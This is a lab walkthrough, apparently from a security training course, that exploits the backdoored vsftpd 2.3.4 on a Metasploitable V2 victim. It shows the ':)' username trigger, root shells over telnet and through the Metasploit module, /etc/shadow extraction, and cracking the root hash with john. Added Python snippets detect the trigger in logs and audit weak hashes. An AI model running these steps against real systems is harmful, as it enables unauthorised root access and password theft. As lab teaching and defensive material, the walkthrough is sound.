(3) Attacking a bug (a vulnerability with a built-in backdoor)
■ Lab systems
- linux200 (EX: attacker system)
- KaliLinux (EX: attacker system)
- Metasploitable V2 Linux (EX: victim system)
■ Outline of the attack
Metasploitable V2 is open source. (A hacker tampered with the original file and redistributed it.)
VSFTPD BUG
If a username is sent that ends in the sequence ":)" [ a happy face ], the backdoored version
will open a listening shell on port 6200.
■ Exploitation process (a vulnerability with a built-in backdoor)
(linux200)
① Check the vsftpd service version
# nmap -sV -p 21 192.168.10.0/24
Interesting ports on 192.168.10.2:
PORT STATE SERVICE VERSION
21/tcp closed ftp
Interesting ports on 192.168.10.50:
PORT STATE SERVICE VERSION
21/tcp closed ftp
....
Interesting ports on 192.168.10.134:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
Service Info: OS: Unix
-> This is the version with the backdoor installed.
-> The vsftpd daemon is using 21/tcp.
② Connect to the vsftpd server and trigger the backdoor
# telnet 192.168.10.134 21
Trying 192.168.10.134...
Connected to 192.168.10.134 (192.168.10.134).
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass invalid
^] (ctrl + ])
telnet> quit
Connection closed.
③ Connect to the backdoor port (6200) with telnet
# telnet 192.168.10.134 6200
Trying 192.168.10.134...
Connected to 192.168.10.134 (192.168.10.134).
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
: command not found
pwd;
/
: command not found
hostname;
metasploitable
: command not found
cat /etc/passwd;
..... (omitted) ....
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
user1:x:1003:1003::/home/user1:/bin/bash
: command not found
exit;
Connection closed by foreign host.
root[~]# telnet 192.168.10.134 6200
Trying 192.168.10.134...
telnet: connect to address 192.168.10.134: Connection refused
telnet: Unable to connect to remote host: Connection refused
-> Once the connection has been closed, the :) (happy face) step has to be performed again before telnet to port 6200 will work.
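Defender-side counterpart to steps ① through ③, as an added example that is not part of the original post: it scans vsftpd protocol-log lines for a USER command carrying the ":)" trigger and flags the 2.3.4 banner seen in step ②. The log line layout (vsftpd with log_ftp_protocol=YES) and the sample lines are assumed and constructed here.

```python
import re

# Constructed sample log lines in the style of vsftpd with log_ftp_protocol=YES
# (the 'FTP command: Client ..., ...' layout is assumed; it is not from this page).
SAMPLE_LOG = """\
Tue Apr  5 13:42:58 2016 [pid 4231] CONNECT: Client "192.168.10.50"
Tue Apr  5 13:42:59 2016 [pid 4231] FTP command: Client "192.168.10.50", "USER alice"
Tue Apr  5 13:43:01 2016 [pid 4233] CONNECT: Client "192.168.10.50"
Tue Apr  5 13:43:02 2016 [pid 4233] FTP command: Client "192.168.10.50", "USER backdoored:)"
Tue Apr  5 13:43:03 2016 [pid 4233] FTP command: Client "192.168.10.50", "PASS <password>"
Tue Apr  5 13:43:10 2016 [pid 4240] FTP command: Client "10.0.0.7", "USER bob"
"""

USER_CMD = re.compile(r'FTP command: Client "(?P<ip>[^"]+)", "USER (?P<user>[^"]*)"')

def is_backdoor_trigger(username: str) -> bool:
    """True if the FTP username carries the ':)' sequence the backdoored
    vsftpd 2.3.4 keys on. The page describes a username *ending* in ':)';
    matching the pair anywhere is a deliberate defender-side over-match."""
    return ":)" in username

def find_trigger_attempts(log_text: str) -> list:
    """Return (client_ip, username) for each USER command that would trigger
    the backdoor. One hit is enough to escalate: a client is probing for the
    backdoored build, whether or not this host actually runs it."""
    hits = []
    for line in log_text.splitlines():
        m = USER_CMD.search(line)
        if m and is_backdoor_trigger(m.group("user")):
            hits.append((m.group("ip"), m.group("user")))
    return hits

def is_backdoored_banner(banner: str) -> bool:
    """Flag the exact banner shown in step 2 of this page. Only 2.3.4 builds
    from the tampered tarball carry the backdoor, so the banner is a lead for
    an inventory check, not proof on its own."""
    return re.search(r"\(vsFTPd 2\.3\.4\)", banner) is not None

if __name__ == "__main__":
    for ip, user in find_trigger_attempts(SAMPLE_LOG):
        print(f"ALERT backdoor trigger from {ip}: USER {user!r}")
    print("banner flagged:", is_backdoored_banner("220 (vsFTPd 2.3.4)"))
```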
(KaliLinux)
④ Let's attack through msfconsole.
# msfconsole -q
msf > search vsftpd
Matching Modules
================
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.10.134
RHOST => 192.168.10.134
msf exploit(vsftpd_234_backdoor) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.10.50:43071 -> 192.168.10.134:6200) at 2016-04-05 13:43:04 +0900
id
uid=0(root) gid=0(root)
hostname
metasploitable
grep root /etc/passwd
root:x:0:0:root:/root:/bin/bash <--- copy this line
grep root /etc/shadow
root:$1$CmDHSTw9$Ei9EjfjLrTkGgX7atpnlW0:16896:0:99999:7::: <--- copy this line
^C
Abort session 1? [y/N] y
msf exploit(vsftpd_234_backdoor) > exit
grep root /etc/passwd
root:x:0:0:root:/root:/bin/bash
grep root /etc/shadow
root:$1$8f58lDnJ$37h9/14eLAk9JHDecfyuh/:17170:0:99999:7:::
Old-style format
root:$1$8f58lDnJ$37h9/14eLAk9JHDecfyuh/:17170:0:99999:7::::0:0:root:/root:/bin/bash
⑤ Using the password hash obtained in step ④, let's perform a password crack.
(Preparatory step) On Metasploitable V2 Linux
$ sudo su -
# passwd root
-> set the password to soldesk1.
# exit
$ exit
# cd /root/bin
# vi pass1.txt
root:x:0:0:root:/root:/bin/bash
# vi pass2.txt
root:$1$CmDHSTw9$Ei9EjfjLrTkGgX7atpnlW0:16896:0:99999:7:::
# unshadow pass1.txt pass2.txt > crack.txt
# cat crack.txt
root:$1$CmDHSTw9$Ei9EjfjLrTkGgX7atpnlW0:0:0:root:/root:/bin/bash
# vi wordlist.txt
administrator
admin
soldesk1.
# john --wordlist=wordlist.txt crack.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 XOP 4x2])
Press 'q' or Ctrl-C to abort, almost any other key for status
soldesk1.        (root)
1g 0:00:00:00 DONE (2016-04-05 14:02) 12.50g/s 37.50p/s 37.50c/s 37.50C/s administrator..soldesk1.
Use the "--show" option to display all of the cracked passwords reliably
Session completed
# john --show crack.txt
root:soldesk1.:0:0:root:/root:/bin/bash

1 password hash cracked, 0 left
Because john works with the old-style format, the hash from the shadow file has to be placed in the 2nd field of /etc/passwd before it can be used.
root:x:0:0:root:/root:/bin/bash
grep root /etc/shadow
root:$1$8f58lDnJ$37h9/14eLAk9JHDecfyuh/:17170:0:99999:7:::
# unshadow /etc/passwd /etc/shadow
root:$1$8f58lDnJ$37h9/14eLAk9JHDecfyuh/:17170:0:99999:7::::0:0:root:/root:/bin/bash
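Added example (not code from the original post) covering the unshadow step in ⑤ and the old-format note above: it rebuilds the merged line the same way the unshadow tool does and then audits the hash field, flagging the md5crypt ($1$) scheme that john cracked instantly here. The root lines are the page's own; the other accounts and the $6$ hash are constructed.

```python
# Constructed sample files. The root lines are the ones this page copies out of the
# victim in step 4; the other accounts (and the $6$ hash) are made up for the other cases.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
"""
SHADOW = """\
root:$1$CmDHSTw9$Ei9EjfjLrTkGgX7atpnlW0:16896:0:99999:7:::
user:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASHNOTREAL:16896:0:99999:7:::
sshd:*:16896:0:99999:7:::
"""

def unshadow(passwd_text: str, shadow_text: str) -> list:
    """What the unshadow tool does: copy the shadow hash into field 2 of the
    matching passwd line and keep the remaining passwd fields."""
    hashes = {l.split(":")[0]: l.split(":")[1] for l in shadow_text.splitlines() if ":" in l}
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed passwd line: skip rather than guess
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged

def hash_scheme(field: str) -> str:
    """Classify a crypt(3) password field by its prefix."""
    if not field:
        return "empty"
    if field[0] in "!*":
        return "locked"
    for prefix, name in (("$1$", "md5crypt"), ("$5$", "sha256crypt"),
                         ("$6$", "sha512crypt"), ("$y$", "yescrypt"), ("$2", "bcrypt")):
        if field.startswith(prefix):
            return name
    return "des-or-unknown"

def weak_accounts(merged_lines: list) -> list:
    """Accounts a wordlist run gets through quickly: empty, legacy DES, or md5crypt
    ($1$), the scheme of this page's root hash. Fix: longer passphrase, re-hash under
    sha512crypt or yescrypt (change the password after the login.defs/PAM update)."""
    weak = []
    for line in merged_lines:
        name, field = line.split(":")[:2]
        if hash_scheme(field) in ("empty", "des-or-unknown", "md5crypt"):
            weak.append(name)
    return weak
```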